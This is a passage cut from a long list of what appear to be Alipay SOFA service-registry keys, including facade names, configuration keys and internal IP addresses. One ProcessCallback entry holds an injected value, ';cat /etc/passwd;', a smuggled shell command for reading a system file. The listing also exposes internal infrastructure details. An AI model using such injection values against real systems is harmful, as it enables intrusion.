OpscloudClientServiceFacade:1.0:cardbin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.AreaCodeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.mcop.ConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmTagItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_RDCP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchiscore.common.service.facade.MrchisLoginInstIdConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.OrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.base.info.property.service.ObjectPropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","kbadvert@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.supergwlite.service.facade.api.MessageSendService:1.0:ifcsupergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.feature.common.service.facade.sql.service.ViewSchedulerTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.sampleBizAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clive.common.service.facade.api.ImageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.181.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:testAccount_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.userview:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insusercenter.facade.policysearch.api.PolicySearchServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:';cat /etc/passwd;'@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:creditgovernance_LevelChange_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.clearCheckBlockCounter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.core.service.antha.AnthaDcAlertDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.common.facade.api.ResourceContextVersionApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BAOXIANGW_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.paymentmng_pcconfigWriteDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundguardian.common.facade.service.GuardianCallbackFacade:1.0:dwalmGuardianCallbackImpl@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:memberprodAuditCallbackServiceV2@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.hydra.OpenRelatedContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.FundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_PUNISHCENTER_CACHE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditprod.service.PcreditInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igmatrix.common.service.facade.ConnectSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.mif.common.service.facade.BusinessAreaPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ap.gloantrade.common.service.facade.api.repay.RepayPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinvest.facade.api.during.InvestPreICManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gauss.recmng.common.service.facade.api.RecRuleManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:sdabombardier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.secmng.common.service.facade.SceneToRoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antfeaturecloud.common.service.facade.FeatureComputingFacade:1.0:alb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.nodejs.ConsumerService:1.0:proxymock-error@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.goodlife.LuckyBagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.CardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.checker.service.WorkOrderConvertService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.mobileprod.common.service.facade.cta.manage.BannerManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.116.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.apply.AssetApplyOrderTaskExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edubizsp.common.service.facade.edu.EduInstManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.137.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintransfercore.common.service.facade.transfer.FinTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recmixer.common.service.mng.facade.ShowcaseMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.OdpsTableServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.MftransMsgRetryDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acctrans.core.config.drm.DrmAccountCacheAutoDeleteRulerConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_BATCH_REFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insqa.facade.autocheck.BaoxianQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityPubConfigResource.pubVelocity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_unique_goods_process_error_node_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.transport.ability.InvestTransportAbilityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.codprod.common.service.facade.logistics.facade.LogisticsWaybillSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.risk.ServiceRiskMngConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.com.service.integration.fcmif.LeadsQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mctlib.biz.manager.service.smartprogram.MctSmartProgramAuditInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.147.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileiclib.common.service.facade.zproxy.SecurityProductQueryZpFacade:1.0:mobileic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.drmdemos:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acmcscore.facade.ChangeOrderFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cfpcenter.emc.common.service.facade.api.EmcCaseManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.core.service.component.ComponentParameterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.query.StandardBailQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.common.service.facade.AntassistantTodoItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:pcreditprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.orderfront:name=com.alipay.orderfront.task.config.recoverStatusTaskTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:publicDomain_malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_YEBPLUS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.underwriting.FirstTrialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.graywall.platform.client.drm.GraywallDrm.graywallConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmcie.common.service.facade.EpRiskEvaluateFacade:1.0:antcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membercenter.service.facade.FundCardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.campaign.CampInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.optlog.OperationLogServiceFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.onlySendAntEventMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmratecust.common.service.facade.rate.offline.RateOfflineUserManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:publiccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchfund.biz.pay.inner.InnerRouteRpcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifecustprod.common.service.facade.home.LifeHomeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acctrans.facade.api.financingtrans.FintransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.PmngDeployGroupManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.repayRedPacketFlow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trafficcardsp.common.service.facade.ValuationEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.ShelfWayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.bot.facade.service.BotSimpleServiceCallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.security.common.bus.QueryHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaocore.service.spi.OpenCardInvokeService:1.0:pcreditauthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetdecision.common.service.facade.api.ConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebdistributor.common.facade.service.FundTradeAgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finstore.common.service.facade.fop.api.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.poscore.common.service.facade.sign.BankSignQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrepaycenter.common.service.facade.ProductOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.antplatform.api.DemandFlowManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcloanbenefit.common.service.facade.jbd11.Jiebei2019D11MissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.18.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paymentmng.service.facade.scienguide.RuleItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.141.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.82.87.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.229.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.108.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.96.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.sendYebTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_ACPLATFORM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insxhbclaimprod.common.service.facade.ClaimNoticePopupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcreditagreement.common.service.agreement.main.PcreditAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.iotcmgr.common.service.facade.service.MerchantAdServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_DATA_COLLABORATION#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antassistant.core.home.service.HomeCardManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FASCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.encourage.service.EncourageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personal.service.cashier.WangdianTradePayInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.rule.core.repository.drm.RepositoryConfigResource.shareComparatorAndScriptCompileResult,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imkteye.biz.daemon.service.StatisticsEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.shakecode.ShakeCodeRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.data.process.facade.code.PreCompileService:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.service.spi.DataLoadService:1.0:finvirtualta@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.core.service.zcache.TairClientGzone:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.querytask.facade.QueryTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.antg.facade.accesstoken.AgATKResourceViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alportalmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:EC-ar-auto-sign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.contentlib.common.service.facade.content.ContentOfferVectorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.common.service.facade.eval.CheckImageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2TickFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.manager.facade.api.EinvInvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CIJobTransform:1.0:jenkinsCITemplateTransform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:pullBlockSplitor_abs_ap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmobilemarket.common.service.facade.fintdop.ServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.tag.TagManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.monitor.MonitorReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.environment.api.EnvironmentManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.query.api.AccenterTitleRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.fininfo.pcconfigwrite.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.GiftService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frscenter.common.service.facade.api.ScenarioSubjectMeasureResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finstore.common.service.facade.fop.api.PromoDayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_Y_ZERO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.instbill.common.service.facade.model.api.bill.common.InstbillDataCenterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.QuestionCategoryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.dataset.DataPointService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.smcp.facade.device.DeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.facade.ScorpioESQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.RelationalRiskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.job.JobAdjustTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.135.248#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:chargefront@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_DEMO_SOFA3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cfmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifxquote.service.facade.api.IfxClientQuoteMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchiscore_adjustSubmitMerchantProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.content.mng.TagMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.servicelibrary.ServiceSpecQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvest.api.facade.HsInstanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.PaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.graybusiness.GrayBusinessCoverageConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.MinutesCandlestickManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbprizeprod.common.service.facade.EventTriggerSupportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.conf.AntqMsgbrokerConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.recon.common.service.facade.fund.api.RegisterInstBillService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.enterprise.api.EPSecurityprodQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.index.balance.BalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcp_easy_member_pay_sign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.savingPlanAlwaysCompletableSwitchConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pucprod.common.service.facade.ebpp.ChargeOutInstMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:accorderexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.kybmeta.facade.api.SchemaRuntimeService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:certRelationRefreshHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.OperationConfigCallbackFacade:1.0:creditacceptance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.StrategyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.authtoken.Oauth2TokenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.equity.EquityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.RoleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:insttrade@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.RpcExternalReleaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskConfigService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdsds.common.service.facade.sensitive.service.SensitiveDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abnclprod.facade.taskflow.api.AbnTenantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.money.api.MoneyConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditkit.facade.service.merchant.BrandQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelSqlStructQueryFacade:1.0:framodelquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PlacardQueryFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_QUOTOCTOPUS53#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.revcore_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipaycore.common.service.facade.query.api.DepositbackQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.open.facade.paidan.operate.IssueOperateOpenF